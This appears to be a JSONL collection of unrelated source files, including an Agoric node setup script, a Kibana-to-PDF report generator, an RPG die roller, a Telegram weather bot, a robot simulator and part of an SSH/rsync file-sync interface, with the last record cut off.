+{"seq_id":"6597917","text":"from twisted.internet.task import react\nfrom twisted.internet import endpoints, defer\nfrom twisted.python import usage\nimport wormhole\nimport treq\nimport json\nimport os.path\nimport shutil\nimport subprocess\nimport sys\nimport os\nimport urllib.request\n\nMAILBOX_URL = u\"ws://relay.magic-wormhole.io:4000/v1\"\n#MAILBOX_URL = u\"ws://10.0.2.24:4000/v1\"\nAPPID = u\"agoric.com/ag-testnet1/provisioning-tool\"\nNETWORK_CONFIG = \"https://testnet.agoric.com/network-config\"\n\n# Locate the ag-solo binary.\n# Look up until we find a different bin directory.\ncandidate = os.path.normpath(os.path.join(os.path.dirname(os.path.realpath(__file__)), '..', '..'))\nAG_SOLO = os.path.join(candidate, 'bin', 'ag-solo')\nwhile not os.path.exists(AG_SOLO):\n next_candidate = os.path.dirname(candidate)\n if next_candidate == candidate:\n AG_SOLO = 'ag-solo'\n break\n candidate = next_candidate\n AG_SOLO = os.path.join(candidate, 'bin', 'ag-solo')\n\nclass Options(usage.Options):\n optParameters = [\n [\"webhost\", \"h\", \"127.0.0.1\", \"client-visible HTTP listening address\"],\n [\"webport\", \"p\", \"8000\", \"client-visible HTTP listening port\"],\n [\"netconfig\", None, NETWORK_CONFIG, \"website for network config\"]\n ]\n def parseArgs(self, basedir=os.environ.get('AG_SOLO_BASEDIR', 'agoric')):\n self['basedir'] = os.environ['AG_SOLO_BASEDIR'] = basedir\n\n\ndef setIngressAndRestart(sm):\n subprocess.run([AG_SOLO, 'set-gci-ingress', '--chainID=%s' % sm['chainName'], sm['gci'], *sm['rpcAddrs']], check=True)\n os.execvp(AG_SOLO, [AG_SOLO, 'start', '--role=client'])\n\n@defer.inlineCallbacks\ndef run_client(reactor, o, pubkey):\n w = wormhole.create(APPID, MAILBOX_URL, reactor)\n wormhole.input_with_completion(\"Provisioning code: \", w.input_code(), reactor)\n cm = json.dumps({\n \"pubkey\": pubkey,\n })\n w.send_message(cm.encode(\"utf-8\"))\n server_message = yield w.get_message()\n sm = json.loads(server_message.decode(\"utf-8\"))\n print(\"server message is\", sm)\n yield w.close()\n\n if not sm['ok']:\n print(\"error from server:\", sm['error'])\n return\n\n BASEDIR = o['basedir']\n setIngressAndRestart(sm)\n\ndef doInit(o):\n BASEDIR = o['basedir']\n # run 'ag-solo init BASEDIR'\n subprocess.run([AG_SOLO, 'init', BASEDIR, '--webhost=' + o['webhost'], '--webport=' + o['webport']], check=True)\n\ndef main():\n o = Options()\n o.parseOptions()\n pkeyFile = os.path.join(o['basedir'], 'ag-cosmos-helper-address')\n # If the public key file does not exist, just init and run.\n if not os.path.exists(pkeyFile):\n doInit(o)\n\n # read the pubkey out of BASEDIR/ag-cosmos-helper-address\n pkfile = open(pkeyFile)\n pubkey = pkfile.read()\n pkfile.close()\n pubkey = pubkey.strip()\n react(run_client, (o,pubkey))\n sys.exit(1)\n\n yesno = input('Type \"yes\" to reset state from ' + o['netconfig'] + ', anything else cancels: ')\n if yesno.strip() != 'yes':\n print('Cancelling!')\n sys.exit(1)\n\n # Blow away everything except the key file and state dir.\n helperStateDir = os.path.join(o['basedir'], 'ag-cosmos-helper-statedir')\n for name in os.listdir(o['basedir']):\n p = os.path.join(o['basedir'], name)\n if p == pkeyFile or p == helperStateDir:\n continue\n if os.path.isdir(p) and not os.path.islink(p):\n shutil.rmtree(p)\n else:\n os.remove(p)\n\n # Upgrade the ag-solo files.\n doInit(o)\n\n # Download the netconfig.\n print('downloading netconfig from', o['netconfig'])\n resp = urllib.request.urlopen(o['netconfig'])\n encoding = resp.headers.get_content_charset('utf-8')\n 
decoded = resp.read().decode(encoding)\n netconfig = json.loads(decoded)\n\n setIngressAndRestart(netconfig)\n sys.exit(1)\n","sub_path":"setup-solo/src/ag_setup_solo/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"488412748","text":"# -*- coding: utf-8 -*-\n#USING UTF-8\n\nfrom time import sleep\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom PIL import Image\nfrom io import BytesIO\nimport tempfile\nfrom fpdf import FPDF\nimport string\nimport random\n\ntitle = 'Network Report'\n\n# PDF Width = 210\nclass PDF(FPDF):\n def header(self):\n # Logo\n self.image('logo-zyxel.png', 10, 7, 20)\n # Arial bold 15\n self.set_font('Arial', 'B', 20)\n # Move to the right\n # Title\n w = self.get_string_width(title) + 6\n self.set_x((210 - w) / 2)\n self.cell(w, 1, title, 0, 0, 'C')\n self.line(10, self.get_y()+5, 200, self.get_y()+5)\n # Line break\n self.ln(10)\n\n # Page footer\n def footer(self):\n # Position at 1.5 cm from bottom\n self.set_y(-15)\n # Arial italic 8\n self.set_font('Arial', 'I', 8)\n # Page number\n self.cell(0, 10, 'Page ' + str(self.page_no()) + '/{nb}', 0, 0, 'C')\n\n\ndef id_generator(size=6, chars=string.ascii_uppercase + string.digits):\n return ''.join(random.choice(chars) for _ in range(size))\n\n\ndef pdf_generator(url):\n print(url)\n pdf = PDF()\n pdf.add_font('notosanscjktc', '', 'NotoSansCJKtc-Regular.ttf', uni=True)\n img_path = 'report.png'\n pdf_path = \"report.pdf\"\n\n chrome_options = Options()\n chrome_options.add_argument('--headless')\n # chrome_options.binary_location = 'chromedriver.exe'\n driver = webdriver.Chrome(options=chrome_options)\n try:\n driver.get(url)\n wait = WebDriverWait(driver, 1000)\n wait.until(lambda driver: driver.current_url != url)\n wait.until(lambda driver: driver.find_element_by_tag_name('svg'))\n total_height = driver.execute_script(\"return document.body.parentNode.scrollHeight\")\n driver.set_window_size(1000, int(total_height))\n sleep(5)\n js = '''\n var x = document.getElementsByClassName('visualize-chart');\n var y = document.getElementsByClassName('panel-title');\n for(var i = x.length-1; i >= 0; --i){\n if(x[i].offsetTop > 10){\n x[i].remove();\n }\n }\n var arr = [];\n for(var i = 0;i < x.length; i++){\n dict = {};\n if (x[i].getElementsByClassName('visualize-error').length > 0) {\n continue;\n }\n if (y[i].getElementsByClassName('table-vis-error').length > 0) {\n continue;\n }\n dict['title'] = y[i].innerText; \n dict['rect'] = x[i].getBoundingClientRect();\n arr.push(dict);\n }\n return arr;\n '''\n test = driver.execute_script(js)\n sleep(10)\n png = driver.get_screenshot_as_png()\n\n driver.quit()\n except Exception:\n driver.quit()\n return 'Failed'\n # Instantiation of inherited class\n pdf.alias_nb_pages()\n pdf.add_page()\n pdf.set_font('notosanscjktc', '', 12)\n with tempfile.TemporaryDirectory() as tmp_dir:\n print(tmp_dir)\n for i in range(len(test)):\n im = Image.open(BytesIO(png))\n # defines crop points\n im = im.crop((test[i]['rect']['left'], test[i]['rect']['top'], test[i]['rect']['right'], test[i]['rect']['bottom']))\n im.save('{}/{}-{}.png'.format(tmp_dir, i, test[i]['title']))\n pdf.cell(0, 10, test[i]['title'], 0, 1)\n pdf.image('{}/{}-{}.png'.format(tmp_dir, i, test[i]['title']), w=190)\n pdf.ln(4)\n\n pdf_name = 'report_{}.pdf'.format(id_generator())\n pdf.output(dest='F', name=pdf_name)\n return pdf_name\n","sub_path":"kibana proj/report/report/app/render_pdf/htmltopdf.py","file_name":"htmltopdf.py","file_ext":"py","file_size_in_byte":3710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"202381428","text":"# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.\n# --\n#\n# File: Alternity.py\n# Version:\n# $Id: Alternity.py,v .1 JEC (cchriss@thecastle.com)\n#\n# Description: Alternity die roller based on Posterboy's D20 Dieroller\n#\n# Changelog:\n#\n# v.1 original release JEC\n#\n# Traipse Release: \n# The changes made in the Traipe release are intended to create a more direct connection\n# between the source and the intrepretor. IF, ELIF statements have been replaced with dictionaries,\n# unused objects have been replace with re-usable objects, and the code has been condensed.\n#\n# SEG: JAN 24 2010 - v.1.4 O'Flux Release:\n# Edits & Additions: fixed a few minor bugs; Damage roll & Display Issues.\n# Added Secondary Damage Calculation and Display. Fix all errors.\n# Added proper results for Critcal Successes with failure ==> final Result Ordinary Success\n# Removed reduntent Method to make parent class true with all others working as child.\n# Made all special output same colour codes font size. Cleaned out old commented lines.\n# Tested for Traipse on Win 7\n#\n# Skill Check Example:\n# [1d20.sk(12,-2)]\n# OUTPUT Example:\n# => [6,-3] = (3) AMAZING Success\n#\n# Pistol, Laser; 0 step -- Attack Example:\n# [1d20.at(12,0,(1d4+1,\"w\"),(1d6+1,\"w\"),(1d4,\"m\"))]\n# OUTPUT Example:\n# => [1,0] = (1) CRITICAL SUCCESS AMAZING HIT\n# ===> Damage [4] = (4) mortal ======> Secondary Damage (2) stun / (2) wound\n#\n# Action Check Example:\n# [1d20.ac(14,-1)]\n# OUTPUT Example:\n# => ACTION CHECK : [18,-3] = (15) Marginal failure\n# -1 Step make up bonus next Action Check\n#\n#\n\nimport re\n\nfrom std import std\nfrom time import time, clock\nfrom orpg.dieroller.base import di, die_base, die_rollers\n\n##from orpg.tools.orpg_log import debug\n\n\n__version__ = \"$Id: alternity.py,v 0.1 2003/01/02 12:00:00 cchriss Exp $\"\n\n# Alternity stands for \"Alternity system\" 20 sided die plus mods\n\nclass alternity(std):\n name = \"alternity\" # ADDED by SEG Nov 2009 ***\n \n def __init__(self,source=[]):\n std.__init__(self,source)\n\n # these methods return new die objects for specific options\n def sk(self,score,mod):\n return sk(self,score,mod)\n\n def at(self,score,mod,dmgo,dmgg,dmga):\n return at(self,score,mod,dmgo,dmgg,dmga)\n\n def ac(self,score,mod):\n return ac(self,score,mod)\n\ndie_rollers.register(alternity)\n\nclass sk(std):\n def __init__(self,source=[],sc=\"10/5/2\",mod=0):\n std.__init__(self,source)\n m = re.match( r\"\\d+\", str(sc) )\n self.score = int( m.group(0) )\n self.mod = mod\n\n def getMod(self,mod=0):\n m=0\n mods = { -4: -di(12), -3: -di(8), -2: -di(6), -1: -di(4), 1: di(4),\n 2: di(6), 3: di(8), 4: di(12), 5: di(20)} # SEG fix 1: di(4) #\n if mod in mods.keys(): m = mods[mod].value\n elif mod <= -5: m=-di(20).value\n elif mod == 6: m=di(20).value + di(20).value\n elif mod >= 7: m=di(20).value + di(20).value + di(20).value\n return m\n\n def getRolLStr(self):\n myStr = \"[\" + str(self.data[0])\n self.d20 = self.sum()\n self.amod = self.getMod(self.mod)\n\n## varN = \"self.amod\"\n## debug(varN)\n## debug(self.amod) ## seg 
added debug output\n \n self.dieRoll = self.d20 + self.amod\n for a in self.data[1:]:\n myStr += \",\"\n myStr += str(a)\n myStr += \",\" + str(self.amod) + \"] = (\" + str(self.dieRoll) + \")\"\n if ( self.dieRoll <= self.score / 4 ): self.success = 'A'\n elif ( self.dieRoll <= self.score / 2 ): self.success = 'G'\n elif ( self.dieRoll <= self.score ): self.success = 'O'\n else: self.success = 'F'\n return myStr\n\n def __str__(self):\n myStr = self.getRolLStr()\n\n## varN = \"myStr\"\n## debug(varN)\n## debug(myStr) ## seg added debug output\n\n successes = {'CS': \" CRITICAL SUCCESS\",\n 'CF': \" CRITICAL FAILURE\",\n 'A': \" AMAZING Success\",\n 'G': \" Good Success\",\n 'O': \" Ordinary Success\",\n 'F': \" failure\"}\n\n if ( self.d20 == 1 ): myStr += successes['CS'] # SEG Dec 19 2009\n myStr += successes[self.success]\n if ( self.d20 == 1 ) and (self.success == 'F') :\n myStr += \" final result ==> \"\n myStr += successes['O'] # SEG JAN 23 2010\n return myStr\n\nclass at(sk):\n ## Traipse Usage: The source I received had the damage rolls like this 1d6s, with the damage type a\n ## letter that could be sliced from the roll. However, the roll is parsed before the letter can be\n ## sliced from it, and with the letter attached it created an error.\n ##\n ## The Traipse method puts the damage type and the damage roll into a Tuple, ie (1d6, 's').\n ## When using this method you must include single or double quoutes around the damage type or the\n ## software will treat it as an object.\n\n def __init__(self,source=[],sc=10, mod=0, dmgo=\"(1d6, 's')\",dmgg=\"(1d6, 'w')\",dmga=\"(1d6, 'm')\"):\n sk.__init__(self,source,sc,mod)\n self.dmgo = dmgo\n self.dmgg = dmgg\n self.dmga = dmga\n\n def getdmg(self,dmgroll):\n astr = \"===> Damage \"\n droll = str(dmgroll[0])\n xyz = droll.split('(')\n secD = (int(xyz[1][:-1])/2) ## SEG* Calculate Secondary Damage\n\n## varN = \"secD\"\n## debug(varN)\n## debug(secD) ## seg added debug output\n\n dtype = dmgroll[1]\n astr += droll\n if dtype==\"s\": astr += \" stun \"\n elif dtype==\"w\":\n astr += \" wound\"+\" ======> Secondary Damage (\"+str(secD) \\\n +\") stun \" # SEG* Display Secondary Damage\n elif dtype==\"m\":\n astr += \" mortal\"+\" ======> Secondary Damage (\"+str(secD) \\\n +\") stun\"+\" / (\"+str(secD)+\") wound \" # SEG* Display Secondary Damage\n return astr\n\n def __str__(self):\n myStr = self.getRolLStr()\n\n## varN = \"myStr\"\n## debug(varN)\n## debug(myStr) ## seg added debug output\n \n successes = {'CS': \" CRITICAL SUCCESS\",\n 'CF': \" CRITICAL FAILURE\",\n 'A': \" AMAZING HIT \",\n 'G': \" Good HIT \",\n 'O': \" Ordinary HIT \",\n 'F': \" miss\"}\n if ( self.d20 == 1 ):\n myStr += successes['CS'] # SEG Dec 19 2009\n\n if ( self.d20 == 1 ) and (self.success == 'F') :\n myStr += successes['F'] # SEG JAN 23 2010\n myStr += \" final result ==> \"\n self.success = 'O'\n\n myStr += successes[self.success]\n if self.success == 'A': myStr += self.getdmg(self.dmga)\n elif self.success == 'G': myStr += self.getdmg(self.dmgg)\n elif self.success == 'O': myStr += self.getdmg(self.dmgo)\n return myStr\n\nclass ac(sk):\n def __init__(self,source=[],sc=10,mod=0):\n sk.__init__(self,source,sc,mod)\n\n def __str__(self):\n myStr = self.getRolLStr()\n\n## varN = \"myStr\"\n## debug(varN)\n## debug(myStr) ## seg added debug output\n \n myStr = \" ACTION CHECK : \"+myStr\n successes = {'CS': \" CRITICAL SUCCESS\",\n 'CF': \" CRITICAL FAILURE\",\n 'A': \" AMAZING Success\",\n 'G': \" Good Success\",\n 'O': \" Ordinary Success\",\n 'F': \" 
Marginal failure\"}\n if self.d20 == 1: \n myStr += successes['CS']\n myStr += ' (' +successes[self.success]+ ' )'\n elif self.d20 == 20: \n myStr += successes['CF']\n myStr += ' (' +successes[self.success]+ ' )'\n else: myStr += successes[self.success]\n return myStr\n\n","sub_path":"data/python/e763e84d9a686ca30a10774db232acf5_alternity.py","file_name":"e763e84d9a686ca30a10774db232acf5_alternity.py","file_ext":"py","file_size_in_byte":9286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"137912379","text":"import telebot\nimport logging\nfrom telebot import types\nimport requests\n\nbot = telebot.TeleBot(API_TOKEN_BOT, threaded=False)\n\nlogger = telebot.logger\ntelebot.logger.setLevel(logging.DEBUG) # Outputs debug messages to console.\nAPI_TOKEN = ''\n\n\n@bot.message_handler(commands=['start'])\ndef send_welcome(message):\n bot.reply_to(message, \"Дороу\")\n\n\n@bot.message_handler(commands=['help'])\ndef send_welcome(message):\n bot.reply_to(message, \"Бог в помощь\")\n\n\n@bot.message_handler(commands=['location'])\ndef location(message):\n keyboard = types.ReplyKeyboardMarkup(row_width=1, resize_keyboard=True)\n button_geo = types.KeyboardButton(text=\"Send de way\", request_location=True)\n keyboard.add(button_geo)\n bot.send_message(message.chat.id, \"Do u now de way\", reply_markup=keyboard)\n\n\n@bot.message_handler(content_types=[\"location\"])\ndef location(message):\n url = requests.get(f'http://api.openweathermap.org/data/2.5/weather?'\n f'lat={message.location.latitude}&lon={message.location.longitude}&appid={API_TOKEN}').json()\n bot.send_message(message.chat.id, text=f'{url.get(\"name\")}, {url.get(\"main\").get(\"temp\")}')\n\n #f'{url.get(\"name\")}, {url.get(\"main\").get(\"temp\")}\n\n\n@bot.message_handler(func=lambda message: True)\ndef echo_message(message):\n bot.reply_to(message, message.text)\n\n\nbot.infinity_polling(True)\n","sub_path":"PoC_bot.py","file_name":"PoC_bot.py","file_ext":"py","file_size_in_byte":1362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"234711072","text":"'''\n/* =======================================================================\n (c) 2015, Kre8 Technology, Inc.\n\n PROPRIETARY and CONFIDENTIAL\n\n This file contains source code that constitutes proprietary and\n confidential information created by David Zhu\n\n Kre8 Technology retains the title, ownership and intellectual property rights\n in and to the Software and all subsequent copies regardless of the\n form or media. Copying or distributing any portion of this file\n without the written permission of Kre8 Technology is prohibited.\n\n Use of this code is governed by the license agreement,\n confidentiality agreement, and/or other agreement under which it\n was distributed. When conflicts or ambiguities exist between this\n header and the written agreement, the agreement supersedes this file.\n ========================================================================*/\n'''\n\nimport Tkinter as tk\nimport time \nimport math\n\nclass virtual_robot:\n def __init__(self):\n #self.robot = None\n self.l = 20*math.sqrt(2) # half diagonal - robot is 40 mm square\n self.x = 0 # x coordinate\n self.y = 0 # y coordinate\n self.a = 0 # angle of the robot, 0 when aligned with verticle axis\n self.dist_l = False\n self.dist_r = False #distance\n self.floor_l = False \n self.floor_r = False \n self.sl = 0 # speed of left wheel\n self.sr = 0 # speed of right wheel\n self.t = 0 # last update time\n\n def reset_robot(self):\n self.x = 0 # x coordinate\n self.y = 0 # y coordinate\n self.a = 0 # angle of the robot, 0 when aligned with verticle axis\n self.dist_l = False\n self.dist_r = False #\n self.floor_l = False \n self.floor_r = False \n self.sl = 0 # speed of left wheel\n self.sr = 0 # speed of right wheel\n self.t = 0 # last update time\n\n def set_robot_speed(self, w_l, w_r):\n self.sl = w_l\n self.sr = w_r\n\n def set_robot_pose(self, a, x, y):\n self.a = a\n self.x = x\n self.y = y\n\n def set_robot_prox_dist(self, dist_l, dist_r):\n self.dist_l = dist_l\n self.dist_r = dist_r\n\n def set_robot_floor (self, floor_l, floor_r):\n self.floor_l = floor_l\n self.floor_r = floor_r\n\nclass virtual_world:\n def __init__(self):\n self.real_robot = False\n self.vrobot = virtual_robot()\n self.canvas = None\n self.canvas_width = 0\n self.canvas_height = 0\n self.area = []\n self.map = []\n self.cobs = []\n self.f_cell_list = []\n self.goal_list = []\n self.goal_list_index = 0\n self.goal_t = \"None\"\n self.goal_x = 0\n self.goal_y = 0\n self.goal_a = 0\n self.goal_achieved = True\n self.trace = False #leave trace of robot\n self.prox_dots = False # draw obstacles detected as dots on map\n self.floor_dots = False\n self.localize = False\n self.glocalize = False\n \n def add_obstacle(self,rect):\n self.map.append(rect)\n\n def draw_map(self):\n canvas_width = self.canvas_width\n canvas_height = self.canvas_height\n for rect in self.map:\n x1 = canvas_width + rect[0]\n y1= canvas_height - rect[1]\n x2= canvas_width + rect[2]\n y2 = canvas_height - rect[3]\n self.canvas.create_rectangle([x1,y1,x2,y2], outline=\"grey\", fill=\"grey\")\n for cobs in self.cobs:\n x1 = canvas_width + cobs[0]\n y1= canvas_height - cobs[1]\n x2= canvas_width + cobs[2]\n y2 = canvas_height - cobs[3]\n #self.canvas.create_rectangle([x1,y1,x2,y2], fill=None)\n\n def draw_robot(self):\n canvas_width = self.canvas_width\n canvas_height = self.canvas_height\n pi4 = 3.1415 / 4 # quarter pi\n vrobot = self.vrobot\n a1 = vrobot.a + pi4\n a2 = vrobot.a + 3*pi4\n a3 = vrobot.a + 5*pi4\n a4 = vrobot.a + 
7*pi4\n\n x1 = canvas_width + vrobot.l * math.sin(a1) + vrobot.x\n x2 = canvas_width + vrobot.l * math.sin(a2) + vrobot.x\n x3 = canvas_width + vrobot.l * math.sin(a3) + vrobot.x \n x4 = canvas_width + vrobot.l * math.sin(a4) + vrobot.x\n\n y1 = canvas_height - vrobot.l * math.cos(a1) - vrobot.y\n y2 = canvas_height - vrobot.l * math.cos(a2) - vrobot.y\n y3 = canvas_height - vrobot.l * math.cos(a3) - vrobot.y\n y4 = canvas_height - vrobot.l * math.cos(a4) - vrobot.y\n\n points = (x1,y1,x2,y2,x3,y3,x4,y4)\n poly_id = vrobot.poly_id\n self.canvas.coords(poly_id, points) \n\n if self.trace:\n pi3 = 3.1415/3\n a1 = vrobot.a\n a2 = a1 + 2*pi3\n a3 = a1 + 4*pi3\n x1 = canvas_width + 3 * math.sin(a1) + vrobot.x\n x2 = canvas_width + 3 * math.sin(a2) + vrobot.x\n x3 = canvas_width + 3 * math.sin(a3) + vrobot.x \n y1 = canvas_height - 3 * math.cos(a1) - vrobot.y\n y2 = canvas_height - 3 * math.cos(a2) - vrobot.y\n y3 = canvas_height - 3 * math.cos(a3) - vrobot.y\n self.canvas.create_polygon([x1,y1,x2,y2,x3,y3], outline=\"blue\")\n\n def radial_intersect(self, a_r, x_e, y_e):\n for obs in self.map:\n x1 = obs[0]\n y1 = obs[1]\n x2 = obs[2]\n y2 = obs[3]\n # first quadrant\n if (a_r >= 0) and (a_r < 3.1415/2): \n #print \"radial intersect: \", x_e, y_e\n if (y_e < y1):\n x_i = x_e + math.tan(a_r) * (y1 - y_e)\n y_i = y1\n if (x_i > x1 and x_i < x2):\n return [x_i, y_i, 1] # 1 indicating intersecting a bottom edge of obs\n if (x_e < x1):\n x_i = x1\n y_i = y_e + math.tan(3.1415/2 - a_r) * (x1 - x_e)\n if (y_i > y1 and y_i < y2):\n return [x_i, y_i, 2] # left edge of obs\n # second quadrant\n if (a_r >= 3.1415/2) and (a_r < 3.1415): \n if (y_e > y2):\n x_i = x_e + math.tan(a_r) * (y2 - y_e)\n y_i = y2\n if (x_i > x1 and x_i < x2):\n return [x_i, y_i, 3] # top edge\n if (x_e < x1):\n x_i = x1\n y_i = y_e + math.tan(3.1415/2 - a_r) * (x1 - x_e)\n if (y_i > y1 and y_i < y2):\n return [x_i, y_i, 2] #left edge\n # third quadrant\n if (a_r >= 3.1415) and (a_r < 1.5*3.1415): \n if (y_e > y2):\n x_i = x_e + math.tan(a_r) * (y2 - y_e)\n y_i = y2\n if (x_i > x1 and x_i < x2):\n return [x_i, y_i, 3] #top edge\n if (x_e > x2):\n x_i = x2\n y_i = y_e + math.tan(3.1415/2 - a_r) * (x2 - x_e)\n if (y_i > y1 and y_i < y2):\n return [x_i, y_i, 4] # right edge\n # fourth quadrant\n if (a_r >= 1.5*3.1415) and (a_r < 6.283): \n if (y_e < y1):\n x_i = x_e + math.tan(a_r) * (y1 - y_e)\n y_i = y1\n if (x_i > x1 and x_i < x2):\n return [x_i, y_i, 1] # bottom edge\n if (x_e > x2):\n x_i = x2\n y_i = y_e + math.tan(3.1415/2 - a_r) * (x2 - x_e)\n if (y_i > y1 and y_i < y2):\n return [x_i, y_i, 4] # right edge\n return False\n\n def get_vrobot_prox(self, side):\n vrobot = self.vrobot\n\n a_r = vrobot.a # robot's orientation, same as sensor orientation\n if (a_r < 0):\n a_r += 6.283\n if (side == \"left\"):\n a_e = vrobot.a - 3.1415/4.5 #emitter location\n else:\n a_e = vrobot.a + 3.1415/4.5 #emitter location\n x_e = (vrobot.l-2) * math.sin(a_e) + vrobot.x #emitter pos of left sensor\n y_e = (vrobot.l-2) * math.cos(a_e) + vrobot.y #emitter pos of right sensor\n\n intersection = self.radial_intersect(a_r, x_e, y_e)\n if intersection:\n x_i = intersection[0]\n y_i = intersection[1]\n if (side == \"left\"):\n vrobot.dist_l = math.sqrt((y_i-y_e)*(y_i-y_e) + (x_i-x_e)*(x_i-x_e))\n if vrobot.dist_l > 120:\n vrobot.dist_l = False\n return vrobot.dist_l\n else :\n vrobot.dist_r = math.sqrt((y_i-y_e)*(y_i-y_e) + (x_i-x_e)*(x_i-x_e))\n if vrobot.dist_r > 120:\n vrobot.dist_r = False\n return vrobot.dist_r\n #print \"sim: \", vrobot.dist_l, 
vrobot.dist_r\n else:\n if (side == \"left\"):\n vrobot.dist_l = False\n return False\n else:\n vrobot.dist_r = False\n return False\n\n def draw_prox(self, side):\n canvas_width = self.canvas_width\n canvas_height = self.canvas_height\n vrobot = self.vrobot\n if (side == \"left\"):\n a_e = vrobot.a - 3.1415/5 #emitter location\n prox_dis = vrobot.dist_l\n prox_l_id = vrobot.prox_l_id\n else:\n a_e = vrobot.a + 3.1415/5 #emitter location\n prox_dis = vrobot.dist_r\n prox_l_id = vrobot.prox_r_id\n if (prox_dis):\n x_e = (vrobot.l-4) * math.sin(a_e) + vrobot.x #emitter pos of left sensor\n y_e = (vrobot.l-4) * math.cos(a_e) + vrobot.y #emitter pos of right sensor\n x_p = prox_dis * math.sin(vrobot.a) + x_e\n y_p = prox_dis * math.cos(vrobot.a) + y_e\n if (self.prox_dots):\n self.canvas.create_oval(canvas_width+x_p-1, canvas_height-y_p-1, canvas_width+x_p+1, canvas_height-y_p+1, outline='red')\n point_list = (canvas_width+x_e, canvas_height-y_e, canvas_width+x_p, canvas_height-y_p)\n self.canvas.coords(prox_l_id, point_list)\n else:\n point_list = (0,0,0,0)\n self.canvas.coords(prox_l_id, point_list)\n\n def draw_floor(self, side):\n canvas_width = self.canvas_width\n canvas_height = self.canvas_height\n vrobot = self.vrobot\n if (side == \"left\"):\n border = vrobot.floor_l\n floor_id = vrobot.floor_l_id\n a = vrobot.a - 3.1415/7 #rough position of the left floor sensor\n else:\n border = vrobot.floor_r\n floor_id = vrobot.floor_r_id\n a = vrobot.a + 3.1415/7 #rough position of the right floor sensor \n x_f = (vrobot.l - 12) * math.sin(a) + vrobot.x\n y_f = (vrobot.l - 12) * math.cos(a) + vrobot.y\n points = (canvas_width+x_f-2, canvas_height-y_f-2, canvas_width+x_f+2, canvas_height-y_f+2)\n self.canvas.coords(floor_id, points)\n if (border): \n self.canvas.itemconfig(floor_id, outline = \"black\", fill=\"black\")\n if (self.floor_dots):\n self.canvas.create_oval(canvas_width+x_f-2, canvas_height-y_f-2, canvas_width+x_f+2, canvas_height-y_f+2, fill='black')\n else:\n self.canvas.itemconfig(floor_id, outline = \"white\", fill=\"white\")\n","sub_path":"HamsterLab7/tk_hamster_GUI_Sim.py","file_name":"tk_hamster_GUI_Sim.py","file_ext":"py","file_size_in_byte":11393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"314360510","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nRemote interfaces\n\nFor now, it is *just* SSH + rsync to work within the subprocess on Unix/Linux\n(macOS is Unix). It is separated to more easily make other backends\n\nAn interface must have the following methods and behaviors from \n'remote_interface_base'. Note that optional methods have a pass but the \nrequired ones will raise a NotImplementedError\n\"\"\"\nfrom __future__ import division, print_function, unicode_literals\n\nimport subprocess\nimport re\nimport sys\nimport os\nimport random\nimport string\nimport json\nimport zlib\nimport shlex\nimport tempfile\n\nfrom io import open\n\nif sys.version_info[0] > 2:\n xrange = range\n unicode = str\n\nfrom . import utils\n\nclass remote_interface_base(object):\n def __init__(self,config,log=None):\n \"\"\"\n * Just pass it the configuration file\n * Optionally, pass it the log object to modify\n \"\"\"\n raise NotImplementedError()\n def file_list(self,attributes,empty):\n \"\"\"\n * Attributes are a list of requested attributes but generally, more\n should be returned in case attributes change.\n * follow the `empty` settings of PFSwalk -- if applicable\n 'store': stores a list of empty directories\n 'remove': Deletes all empty directories if (and only if) they \n were *not* empty before. Also removes stored list\n 'reset': Removes stored list\n \"\"\"\n raise NotImplementedError()\n \n def apply_queue(self,queue,force):\n \"\"\"\n * queue is the action queue that takes the following form\n * {'backup':[file_path]} # Make a copy to the backup\n * {'move': [src,dest]} # Move the file\n * {'delete': [file_path]} # Move the file into the backup. Essentially a backup\n * Force tells it to allow a file to be moved into another\n\n Notes:\n * If a file is to be moved into another, it should not work unless\n force is set. If force it set, it should backup the file as per\n config.backup\n * Delete should backup first if set config.backup == True\n * Backup should NOT happen if config.backup == False\n * If a backup of the file already exists, it should append an integer\n starting at 0\n \"\"\"\n raise NotImplementedError()\n \n def transfer(self,tqA2B,tqB2A):\n \"\"\"\n * Apply the trasnfer from B to A and from A to B\n * MUST maintain modification times upon transfer\n \"\"\"\n raise NotImplementedError()\n\n def close(self):\n \"\"\"\n * If it has this function, it will try to call it at the very end\n \"\"\"\n pass\n\n @staticmethod\n def cli(argv): \n \"\"\"\n should be decorated with @staticmethod\n All of the commands will be passed. 
Can use this to communicate remotely\n if needed\n\n For example\n ./PyFiSync.py _api file_list --flag1 val1 --flag2\n\n will pass argv = ['file_list', '--flag1', 'val1', '--flag2']\n \"\"\"\n pass\n\nclass ssh_rsync(remote_interface_base):\n def __init__(self,config,log=None):\n self.config = config\n if log is None:\n log = utils.logger(silent=False,path=None)\n self.log = log\n if config.persistant:\n # Set up master connection for 600 seconds \n self.sm = '-S /tmp/' + _randstr(5)\n cmd = 'ssh -N -M {sm:s} -p {ssh_port:d} -q {userhost:s}'.\\\n format(sm=self.sm,**config.__dict__) \n \n self.persistant_proc = subprocess.Popen(shlex.split(cmd))\n \n else:\n self.sm = '' # Do nothings\n \n def file_list(self,attributes,empty=None):\n \"\"\"\n Get the file list in B (remote)\n \"\"\" \n attributes = list(set(attributes))\n config = self.config\n log = self.log\n\n\n # Construct the command\n cmd = 'ssh {sm} -p {ssh_port:d} -q {userhost:s} \"'.format(sm=self.sm,**config.__dict__)\n\n # construct the call cmd\n if len(config.PyFiSync_path) == 0:\n cmd += 'PyFiSync _api file_list\"'\n else:\n cmd += config.remote_program + ' '\n if any(config.PyFiSync_path.endswith('PyFiSync'+ext) for ext in ['','.py']):\n cmd += config.PyFiSync_path 